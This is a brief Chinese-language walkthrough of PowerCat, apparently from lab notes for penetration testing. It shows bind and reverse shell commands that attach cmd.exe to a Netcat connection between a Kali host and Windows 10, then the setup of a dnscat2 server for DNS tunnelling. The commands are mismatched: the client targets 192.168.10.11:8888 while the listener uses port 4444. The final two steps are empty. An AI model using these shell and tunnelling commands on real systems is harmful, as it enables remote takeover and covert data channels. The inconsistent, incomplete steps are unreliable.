下载
地址:https://github.com/besimorhino/powercat
运行
使用:
由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。
kali:192.168.206.128
win10:192.168.206.1
-e Execute. Specify the name of the process to start.
运行。开启运行一个程序
正向连接
Windows上的powercat正向连接Kali上的nc
kali上开启监听:
- nc -lvvp 4444
win10将本地上的cmd.exe程序连接到kali的4444端口
- Import-Module .\powercat.ps1
- powercat -c 192.168.10.11 -p 8888 -e cmd.exe
反向链接
kali上的nc反向链接到windows上的powercat
kali:
- nc 192.168.206.1 4444 -vv
win10
- Import-Module .\powercat.ps1
- powercat -l -p 8888 -e cmd.exe -v
Powercat DNS隧道通信
PowerCat也是一套基于DNS通信的协议,PowerCat的DNS通信是基于dnscat。所以,在使用DNS隧道通信前,需要在我们的VPS上安装dnscat。
vps上安装dnscat
1,安装git: yum -y install git
2,下载dnscat: git clone https://github.com/iagox86/dnscat2.git
3,cd dnscat2/server/
yum -y install gem
4,gem install bundler
版本过低
参考升级版本:https://www.cnblogs.com/xzlive/p/13596829.html
5,bundle install
6,vps上执行
7,目标机上执行
参考大佬文章:
https://www.cnblogs.com/ly584521/p/12360704.html
https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w